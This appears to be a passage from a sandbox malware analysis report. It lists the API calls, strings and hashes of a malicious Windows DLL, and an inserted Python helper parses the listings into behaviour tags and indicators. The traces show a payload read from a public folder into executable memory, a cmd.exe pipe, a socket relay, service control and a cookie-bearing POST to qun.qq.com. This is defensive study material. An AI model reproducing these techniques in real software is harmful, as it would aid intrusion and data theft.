                                                  • #4278.MFC42(00000030,00000001,00000000,00000022,00000001,100FB4F0,100FA644), ref: 10011BD6
                                                  • #858.MFC42(00000000,00000030,00000001,00000000,00000022,00000001,100FB4F0,100FA644), ref: 10011BE5
                                                  • #4129.MFC42(?,00000000,100FB4F0,100FA644), ref: 10011C8B
                                                  • #858.MFC42(00000000,?,00000000,100FB4F0,100FA644), ref: 10011C98
                                                  • #800.MFC42(00000000,?,00000000,100FB4F0,100FA644), ref: 10011CA6
                                                  • #535.MFC42(?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011CC2
                                                  • #858.MFC42(00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011CFA
                                                  • #858.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D07
                                                  • #2614.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D10
                                                  • #2614.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D19
                                                  • #5710.MFC42(?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D32
                                                  • #858.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D41
                                                  • #800.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D4F
                                                  • #6282.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D58
                                                  • #2784.MFC42(100FB4F0,00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D66
                                                  • #535.MFC42(?,?,100FB4F0,100FA644), ref: 10011D8D
                                                  • #858.MFC42(00000022,?,000000FF,?,?,100FB4F0,100FA644), ref: 10011DC5
                                                  • #858.MFC42(00000022,00000022,?,000000FF,?,?,100FB4F0,100FA644), ref: 10011DD2
                                                  • #800.MFC42(100FB4F0,100FA644), ref: 10011DE8
                                                  • #800.MFC42(100FB4F0,100FA644), ref: 10011DF6
                                                  • #800.MFC42(100FB4F0,100FA644), ref: 10011E07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: same nine module dumps as listed for the previous function (identical for every function in this module)
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #858$#800$#535$#2614#2784#540#6282$#4129#4278#5710#6283#6662#941
                                                  • String ID: /
                                                  • API String ID: 2746067309-2043925204
                                                  • Opcode ID: 0da93068c975a70c7a6139256a48672d71f2cdb22226152c638404c253ca3162
                                                  • Instruction ID: 26f83c008789524febe6ecc07bb2f6c57f414736253c4046dad23ffb5fd3ab93
                                                  • Opcode Fuzzy Hash: 0da93068c975a70c7a6139256a48672d71f2cdb22226152c638404c253ca3162
                                                  • Instruction Fuzzy Hash: 9F91B175008385AFC344DF64D591EABF7E5EF98214F804A1CF4A657292EB30FA49CB92
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,SetEvent), ref: 10001717
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001720
                                                  • LoadLibraryA.KERNEL32 ref: 10001792
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001795
                                                  • LoadLibraryA.KERNEL32(user32.dll,GetMessageA), ref: 100017A5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100017A8
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer), ref: 100017B6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100017B9
                                                  • LoadLibraryA.KERNEL32(USER32.dll,TranslateMessage), ref: 100017C9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100017CC
                                                  • LoadLibraryA.KERNEL32(USER32.dll,DispatchMessageA), ref: 100017DC
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100017DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: same nine module dumps as listed for the previous function (identical for every function in this module)
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: DispatchMessageA$F$GetMessageA$KERNEL32.dll$O$S$SetEvent$TranslateMessage$USER32.dll$W$WINMM.dll$a$b$c$g$j$l$n$o$r$user32.dll$waveInAddBuffer
                                                  • API String ID: 2574300362-3155383694
                                                  • Opcode ID: 7e8f983e9651bb8cb031b777cd2917f1a46b555af6ce2a16da49d6b9aa20f874
                                                  • Instruction ID: ccfd42d412a131656b4a3d3b70f2aa919a29a5acdd925cac9141545cb71d5cde
                                                  • Opcode Fuzzy Hash: 7e8f983e9651bb8cb031b777cd2917f1a46b555af6ce2a16da49d6b9aa20f874
                                                  • Instruction Fuzzy Hash: 4341C06050C384AAE310DBB98C48B8BBFD8AFD6758F040A1DF5C497281C679D648CB77
                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001EA4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: same nine module dumps as listed for the previous function (identical for every function in this module)
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$AddressCloseLibraryLoadModuleProc
                                                  • String ID: .$2$3$C$F$F$G$K$L$N$P$R$S$W$a$d$i$i$i$i$i$l$l$l$l$l$n$o$r$r$r$t$t$t$t$z
                                                  • API String ID: 1380958172-3142711299
                                                  • Opcode ID: ee90e264bc5d62a42489c88669f886a09d5ee129677a9a2e2aed8f7aaea50efa
                                                  • Instruction ID: 696425c67723a87576a0cc16c5867392c1d34f4365c322855185195348325f3b
                                                  • Opcode Fuzzy Hash: ee90e264bc5d62a42489c88669f886a09d5ee129677a9a2e2aed8f7aaea50efa
                                                  • Instruction Fuzzy Hash: 5E71252114C3C0DDE342C6A88888B5FFFD55BA6748F48499DF2C85B292D2FA9548C77B
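The function listings on this page are only useful once the call lines are turned into something a detection engineer can query, so the following Python is an added example (not part of the Joe Sandbox report and not code from the sample) that parses the `• Api.MODULE(args), ref: ADDR` lines into records, assigns per-function behaviour tags for the patterns visible here (the LoadLibraryA/GetProcAddress resolver chain at 1002C1EF, OpenSCManagerA/StartServiceA next to OpenProcess/TerminateProcess in the launcher at 1000FEF3, and in the loader at 10020C4A further down a VirtualAlloc with MEM_COMMIT (0x1000) and PAGE_EXECUTE_READWRITE (0x40) that is then filled by ReadFile from C:\Users\Public\Documents\MM\4.txt), and buckets the `$`-joined String ID values into paths, hosts, URLs, URI paths and commands. The excerpts embedded in the code are copied from listings on this page; the tag names, the GetProcAddress threshold and the set of CLI tools treated as commands are my own choices, not anything the report defines.

```python
"""Parse Joe Sandbox function listings ("• Api.MODULE(args), ref: ADDR") into records, tag
coarse behaviours per function and pull IOCs out of the '$'-joined String ID values.
Added example for this report; the excerpts below are copied from listings on this page."""
import re
from collections import Counter

LINE_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                     r"(?P<api>\S+?)\.(?P<mod>[A-Za-z0-9_]+)"
                     r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$")
IDENT_RE, PATH_RE = re.compile(r"^[A-Za-z_]\w+$"), re.compile(r"^[A-Za-z]:\\")
HOST_RE, URL_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I), re.compile(r"https?://[^\s%]+")
URI_RE = re.compile(r"^/[\w./-]+$")
NOT_HOST_EXT = {"dll", "exe", "sys", "txt"}        # "wininet.dll" is a module name, not a host
CLI_TOOLS = {"schtasks", "sc", "net", "reg", "cmd", "powershell"}   # my choice of LOLBins
MEM_COMMIT, PAGE_EXECUTE_READWRITE = 0x1000, 0x40  # VirtualAlloc flAllocationType / flProtect

LISTINGS = {  # copied from the listings at 1002C1EF, 1000FEF3 and 10020C4A on this page
    "resolver": r"""
• LoadLibraryA.KERNEL32 ref: 1002C1EF
• GetProcAddress.KERNEL32(00000000), ref: 1002C1F8
• LoadLibraryA.KERNEL32(wininet.dll,InternetCloseHandle), ref: 1002C226
• GetProcAddress.KERNEL32(00000000), ref: 1002C229
• LoadLibraryA.KERNEL32(wininet.dll,InternetOpenUrlA), ref: 1002C239
• GetProcAddress.KERNEL32(00000000), ref: 1002C23C
""",
    "launcher": r"""
• #823.MFC42(00000000), ref: 1000FF29
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 1000FF57
• TerminateProcess.KERNEL32(00000000,00000000), ref: 1000FF66
• OpenSCManagerA.ADVAPI32(00000000,00000000,00020000), ref: 1001002F
• OpenServiceA.ADVAPI32(00000000,1011EC82,00000010), ref: 10010043
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010066
""",
    "loader": r"""
• ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C4A
• CreateFileA.KERNEL32(C:\Users\Public\Documents\MM\4.txt,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000001,?,00000000), ref: 10020D06
• VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 10020D35
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000), ref: 10020D51
""",
}
STRING_IDS = [  # String ID values copied from four listings on this page
    "$/cgi-bin/qun_mgr/search_group_members$Accept: */*Referer: http://qun.qq.com%sAccept-Language: "
    "zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; "
    "MSIE 9.0; Windows NT 6.1)$POST$qun.qq.com",
    "$($)$.$/$0$4$CreateFileA$InternetCloseHandle$InternetOpenA$KERNEL32.dll$WININET.dll$wininet.dll$z",
    r"C:\Users\Public\Documents\MM\4.txt$schtasks /Query /TN MM",
    "-inst$D$D",
]

def parse_calls(text):
    """One dict per API line; headers and anything else that is not a call are skipped."""
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        calls.append({"api": m["api"], "module": m["mod"].upper(), "ref": m["ref"],
                      "args": m["args"].split(",") if m["args"] else [], "subcall": m["sub"]})
    return calls

def _hex(arg):
    try:
        return int(arg, 16)
    except ValueError:   # "?" marks a value the sandbox could not recover
        return None

def resolved_imports(calls):
    """Procedure names resolved at run time. The name already sits in the next stack slot when
    LoadLibraryA is called, so these listings print it as a second LoadLibraryA argument."""
    return {c["args"][1] for c in calls if c["api"] == "LoadLibraryA"
            and len(c["args"]) > 1 and IDENT_RE.match(c["args"][1])}

def behaviour_tags(calls, min_resolved=3):
    """Coarse tags for one function; 'Part of subcall' lines belong to callees and are ignored."""
    own = [c for c in calls if c["subcall"] is None]
    apis = Counter(c["api"] for c in own)
    tags = set()
    if apis["GetProcAddress"] >= min_resolved:
        tags.add("dynamic_api_resolution")
    if apis["OpenSCManagerA"] and apis["StartServiceA"]:
        tags.add("service_start")
    if apis["OpenProcess"] and apis["TerminateProcess"]:
        tags.add("kills_process")
    for c in own:  # MEM_COMMIT with PAGE_EXECUTE_READWRITE: a buffer meant to hold code
        if c["api"] == "VirtualAlloc" and len(c["args"]) > 3:
            alloc, prot = _hex(c["args"][2]) or 0, _hex(c["args"][3])
            if alloc & MEM_COMMIT and prot == PAGE_EXECUTE_READWRITE:
                tags.add("rwx_allocation")
    if "rwx_allocation" in tags and apis["CreateFileA"] and apis["ReadFile"]:
        tags.add("payload_read_from_file")  # file contents end up in the executable buffer
    return tags

def extract_iocs(string_id_lines):
    """Bucket the usable '$'-separated String ID tokens; one-character tokens are filler."""
    iocs = {k: set() for k in ("paths", "hosts", "urls", "uri_paths", "commands")}
    for tok in (t.strip() for line in string_id_lines for t in line.split("$")):
        if len(tok) < 2:
            continue
        iocs["urls"].update(URL_RE.findall(tok))
        if PATH_RE.match(tok):
            iocs["paths"].add(tok)
        elif HOST_RE.match(tok) and tok.rsplit(".", 1)[1].lower() not in NOT_HOST_EXT:
            iocs["hosts"].add(tok)
        elif URI_RE.match(tok):
            iocs["uri_paths"].add(tok)
        elif tok.split()[0].lower() in CLI_TOOLS:
            iocs["commands"].add(tok)
    return iocs
```

Feed it one function listing at a time: the tags are meant per function, and `Part of subcall function` lines are attributed to the callee, so the GetProcAddress calls inside 1001B660 do not make its callers look like resolvers. For the loader the combination that matters is the order of the calls, not any single API: CreateFileA on a file under C:\Users\Public, a committed PAGE_EXECUTE_READWRITE buffer, and ReadFile into it; the `schtasks /Query /TN MM` string in the same listing queries a scheduled task named MM, which is what `/TN` takes.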
                                                  APIs
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C4A
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C5D
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C7A
                                                  • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020CA0
                                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(1011FA14,00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020CDD
                                                  • CreateFileA.KERNEL32(C:\Users\Public\Documents\MM\4.txt,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000001,?,00000000), ref: 10020D06
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D1A
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 10020D35
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000), ref: 10020D51
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D69
                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42), ref: 10020D81
                                                  • Sleep.KERNEL32(000007D0,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D8E
                                                  • #825.MFC42(?,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020DB0
                                                  • #825.MFC42(?,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020DE3
                                                  • MessageBoxA.USER32(00000000,1011F9D8,1011F9E8,00000000), ref: 10020E05
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020E14
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020E26
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: same nine module dumps as listed for the previous function (identical for every function in this module)
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@$File$#825Virtual$?find@?$basic_string@AllocCloseCreateEos@?$basic_string@FreeGrow@?$basic_string@HandleMessageReadSizeSleep
                                                  • String ID: C:\Users\Public\Documents\MM\4.txt$schtasks /Query /TN MM
                                                  • API String ID: 954268177-2491561334
                                                  • Opcode ID: 1ff5adcc3b13ce8133206020c1749af2d6b1b4d41c1780870a0bcc4895dea406
                                                  • Instruction ID: eee99fee9f34857cce5813bf56fbbaab41e91e05ea10bfdddcd6c1257e282fc6
                                                  • Opcode Fuzzy Hash: 1ff5adcc3b13ce8133206020c1749af2d6b1b4d41c1780870a0bcc4895dea406
                                                  • Instruction Fuzzy Hash: 6B910235A01358ABEB14CBA4DC89BEDBBB5EF19710F580259F80AB72C2C7751A41CB61
                                                  APIs
                                                    • Part of subcall function 100109B0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                    • Part of subcall function 100109B0: GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                  • LoadLibraryA.KERNEL32 ref: 1002176D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021776
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 10021786
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021789
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CreatePipe), ref: 10021799
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002179C
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetStartupInfoA), ref: 100217AC
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100217AF
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateProcessA), ref: 100217BF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100217C2
                                                  • WaitForInputIdle.USER32(?,000000FF), ref: 10021998
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$IdleInputWait
                                                  • String ID: C$CreatePipe$CreateProcessA$D$GetStartupInfoA$GetSystemDirectoryA$H$KERNEL32.dll$\cmd.exe$a$dnaH$n$o$s$x32$x64
                                                  • API String ID: 2019908028-49846795
                                                  • Opcode ID: ce84df58b7b6a488c50ae0de7624002763e034ac238bc98047c6de92e255ee04
                                                  • Instruction ID: 92f248a0eebfd2599b3cf5bc321e4dec982d7722fd2a173f039d14557fa12c24
                                                  • Opcode Fuzzy Hash: ce84df58b7b6a488c50ae0de7624002763e034ac238bc98047c6de92e255ee04
                                                  • Instruction Fuzzy Hash: 05C1AD75608384AFC724CF28C880BDBBBE5EFD9710F50492DF5889B280DB749945CB96
                                                  APIs
                                                  • CoInitialize.OLE32 ref: 1002AED3
                                                  • CoCreateInstance.OLE32(100B7A14,00000000,00000001,100B7A34,?), ref: 1002AEEC
                                                  • LocalAlloc.KERNEL32(00000040,00002710), ref: 1002AEFB
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AF92
                                                  • #823.MFC42(00000000), ref: 1002AFA5
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AFC0
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AFDD
                                                  • #823.MFC42(00000000), ref: 1002AFED
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002B008
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 1002B016
                                                  • wsprintfA.USER32 ref: 1002B066
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002B070
                                                  • lstrlenA.KERNEL32(?), ref: 1002B079
                                                  • lstrlenA.KERNEL32(?), ref: 1002B082
                                                  • LocalSize.KERNEL32(?), ref: 1002B094
                                                  • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 1002B0A2
                                                  • lstrlenA.KERNEL32(?), ref: 1002B0B1
                                                  • lstrlenA.KERNEL32(?), ref: 1002B0D8
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002B0E7
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002B103
                                                  • lstrlenA.KERNEL32(?), ref: 1002B116
                                                  • lstrlenA.KERNEL32(?), ref: 1002B134
                                                  • #825.MFC42(00000000), ref: 1002B17B
                                                  • #825.MFC42(?), ref: 1002B1C0
                                                  • CoUninitialize.OLE32 ref: 1002B1F5
                                                  • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 1002B203
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$ByteCharLocalMultiWide$Alloc$#823#825Time$CreateFileInitializeInstanceSizeSystemUninitializewsprintf
                                                  • String ID: %d-%d-%d %d:%d:%d
                                                  • API String ID: 1491319390-2068262593
                                                  • Opcode ID: 27e75279608e98eea4302a7bf493d0ea2090c819ab884ec49446e4557a7d0828
                                                  • Instruction ID: 209b5a1a77a50804524a6c14720c253af11b3270fcac6344b3acf558e8b2e5ca
                                                  • Opcode Fuzzy Hash: 27e75279608e98eea4302a7bf493d0ea2090c819ab884ec49446e4557a7d0828
                                                  • Instruction Fuzzy Hash: C6A1D171248302ABD310CF24DC95F6BB7E9EFC9700F944A2CF995A7391DA35E8098792
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(1012C4C8), ref: 1002371C
                                                  • LeaveCriticalSection.KERNEL32(1012C4C8), ref: 10023734
                                                  • malloc.MSVCRT ref: 1002374D
                                                  • malloc.MSVCRT ref: 10023756
                                                  • malloc.MSVCRT ref: 1002375F
                                                  • recv.WS2_32 ref: 100237C6
                                                  • send.WS2_32 ref: 10023846
                                                  • getpeername.WS2_32(?,?,?), ref: 1002387B
                                                  • inet_addr.WS2_32(00000000), ref: 10023888
                                                  • inet_addr.WS2_32(00000000), ref: 100238A2
                                                  • htons.WS2_32(?), ref: 100238AD
                                                  • send.WS2_32 ref: 100238EF
                                                  • CreateThread.KERNEL32(00000000,00000000,10023D00,?,00000000,?), ref: 1002392E
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1002393F
                                                    • Part of subcall function 100234D0: htons.WS2_32 ref: 100234F3
                                                    • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023509
                                                    • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023527
                                                    • Part of subcall function 100234D0: socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                    • Part of subcall function 100234D0: setsockopt.WS2_32 ref: 1002355E
                                                    • Part of subcall function 100234D0: connect.WS2_32(?,?,00000010), ref: 1002356E
                                                    • Part of subcall function 100234D0: closesocket.WS2_32 ref: 1002357C
                                                  • send.WS2_32(?,?,00000008,00000000), ref: 10023990
                                                  • CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 100239BD
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00000008,00000000), ref: 100239CA
                                                    • Part of subcall function 100232C0: gethostbyname.WS2_32(?), ref: 100232C5
                                                  • closesocket.WS2_32(00000000), ref: 100239D9
                                                  • closesocket.WS2_32(?), ref: 100239DF
                                                  • free.MSVCRT ref: 100239E8
                                                  • free.MSVCRT ref: 100239EB
                                                  • free.MSVCRT ref: 100239F2
                                                  • free.MSVCRT ref: 100239F5
                                                    • Part of subcall function 10022E40: EnterCriticalSection.KERNEL32(1012C4C8), ref: 10022E6A
                                                    • Part of subcall function 10022E40: LeaveCriticalSection.KERNEL32(1012C4C8), ref: 10022E82
                                                    • Part of subcall function 10022E40: send.WS2_32(?,HTTP/1.0 200 OK,?,00000000), ref: 10022F1E
                                                    • Part of subcall function 10022E40: CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 10022FBC
                                                    • Part of subcall function 10022E40: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00000000), ref: 10022FC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSectionfreeinet_addrsend$CreateObjectSingleThreadWaitclosesocketmalloc$EnterLeavehtons$connectgethostbynamegetpeernamerecvsetsockoptsocket
                                                  • String ID: [
                                                  • API String ID: 3942976521-784033777
                                                  • Opcode ID: d7d33f5bb2a8c6a7b3589d6817ef937f63f56efa85a12ad83d1bc82f9d9e6c5c
                                                  • Instruction ID: 05d794b11b0cc2ecf4f84af8a3101db29113959690cf5300897258d7978ea0c0
                                                  • Opcode Fuzzy Hash: d7d33f5bb2a8c6a7b3589d6817ef937f63f56efa85a12ad83d1bc82f9d9e6c5c
                                                  • Instruction Fuzzy Hash: 7F81F270608344AFE310DB68DC85B5BBBE8EFC5754F548A1EF58983390E7B1E8448B62
                                                  APIs
                                                  • InternetOpenA.WININET(DownloadApp,00000001,00000000,00000000,00000000), ref: 1002082B
                                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D14A3D8,1011F980,?,?,1002128D,?,00000001,?,?,00000001), ref: 10020846
